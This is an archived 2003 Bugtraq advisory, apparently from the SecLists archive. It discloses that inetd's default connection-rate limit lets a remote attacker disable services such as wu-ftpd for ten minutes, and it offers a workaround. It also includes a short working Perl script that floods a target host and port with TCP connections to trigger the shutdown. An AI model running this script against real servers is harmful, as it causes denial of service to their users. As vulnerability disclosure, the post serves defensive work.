Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: 11 years of inetd default insecurity?

11 years of inetd default insecurity?

From: 3APA3A <3APA3A_at_SECURITY.NNOV.RU>
Date: Sat, 6 Sep 2003 18:08:22 +0400

Dear bugtraq_at_securityfocus.com,

Well, we all blame Microsoft in insecure default configuration... Isn't
it time to clean outdated code in Unix?

I. Intro

Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
one below) kills ftp service... With closer look we have good old inetd
feature a lot of existing FreeBSD/linux installations are still
vulnerable. This problem is known since ancient time [1] and was
discussed again and again, but still present. In fact, problem is well
known. It's just another rake everyone steps to. It's on any man and
FAQ, but may be it's time to resolve it? Because it's definitely a BUG.

II. Who is vulnerable

Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).

III. Details

Inetd has an option

     -R rate
             Specify the maximum number of times a service can be invoked in
             one minute; the default is 256. A rate of 0 allows an unlimited
             number of invocations.

The problem is, remote attacker can establish as much connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections received in one minute? It will disable service for next
10 minutes to help attack to succeed. Of cause, this is documented.
Interval is not configurable.

something like

Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated

will appear in logs... If connection is closed by attacker before
service actually starts, IP address of attacker will never be logged.

IV. Workaround

-R 0 -s your_ad_can_be_here

or ask everyone to do not bother your server.

V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl

use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host);
$padr=sockaddr_in($port,$iadr);
for($i=0; $i < 300; $i++)
{
 socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 connect(SOCK,$padr) or next;
 close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

VI. References:

[1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html 

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)
Received on Sep 06 2003
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]